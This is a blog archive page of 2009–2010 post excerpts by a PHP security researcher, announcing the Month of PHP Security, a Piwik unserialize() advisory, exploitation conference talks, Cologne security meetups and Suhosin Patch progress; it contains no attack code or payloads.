Archive for the ‘Security’ Category
Saturday, February 27th, 2010
I previously blogged a sneak preview of the Month of PHP Security which is a new initiative to improve security in the PHP ecosystem. Today the call for papers was released. Everyone from the PHP and security community is invited to produce quality articles/advisories about PHP security topics/bugs and submit ...
Posted in PHP, Security | 3 Comments »
Friday, February 19th, 2010
Three years ago the Hardened-PHP project organized the Month of PHP Bugs. During one month I disclosed more than 40 vulnerabilities in the PHP interpreter in order to improve the overall security of PHP. In the history of PHP this event has been one of a kind. But now, three ...
Posted in PHP, Security | 10 Comments »
Wednesday, December 9th, 2009
I released an important advisory about a remotely exploitable unserialize() vulnerability in Piwik today.
SektionEins GmbH
...
Posted in PHP, Security | 3 Comments »
Saturday, November 28th, 2009
My company SektionEins that is specialised in web application security audits, consulting and trainings has finished the english translation of the PHP Security Poster. This poster is send out for free to interested PHP programmers (until out of stock). The poster is of DIN A0 size and details the most ...
Posted in PHP, Security | 11 Comments »
Saturday, November 28th, 2009
At yesterday's RSS09 conference I gave a slightly different version of my "Shocking News in PHP Exploitation" talk. This time I disclosed for the first time how unserializing user input in Zend Framework based applications can result in direct remote PHP code execution.
The topics of my talk were
easy ways to ...
Posted in PHP, Security | No Comments »
Saturday, November 28th, 2009
On 5th of November I gave a talk titled "Shocking News in PHP Exploitation" at the Powerofcommunity hacking/security conference in Seoul, South Korea. Afterwards I uploaded my slides to this server but only distributed the link through twitter. I totally forgot about announcing the slides in my blog.
The topics of ...
Posted in PHP, Security, korea | No Comments »
Wednesday, October 7th, 2009
I am pleased to announce that Thursday 22th of October 2009 at 19:30 there will be the 10th CGNSec meetup in Cologne/Germany. The meeting takes place at Hallmackenreuther, Brüsseler Platz 9, 50674 Köln (Google Maps).
Everyone working in the field of information security is invited to attend. If you are attending ...
Posted in CGNSec, Security | No Comments »
Thursday, September 24th, 2009
This year I will return to Power of Community in Seoul and present a session about state of the art exploitation of PHP applications and servers. Unlike my Syscan and Blackhat talk I will also demonstrate how to find unusual code execution vulnerabilities and how to tunnel attacks through web ...
Posted in PHP, Security, korea | 3 Comments »
Monday, September 21st, 2009
I just wanted to announce that this wednesday (23th of September 2009) at 19:30 there will be the next CGNSec meetup in Cologne/Germany. The meeting takes place at Hallmackenreuther, Brüsseler Platz 9, 50674 Köln (Google Maps).
Everyone working in the field of information security is invited to attend. If you are ...
Posted in CGNSec, Security | No Comments »
Thursday, August 13th, 2009
It has been several weeks between the release of PHP 5.3.0 and now and I haven't released a stable Suhosin Patch for PHP 5.3.0 yet. The reason for this was that I was away from my development machine with a half ready new generation of Suhosin Patch waiting to be ...
Posted in PHP, Security | 8 Comments »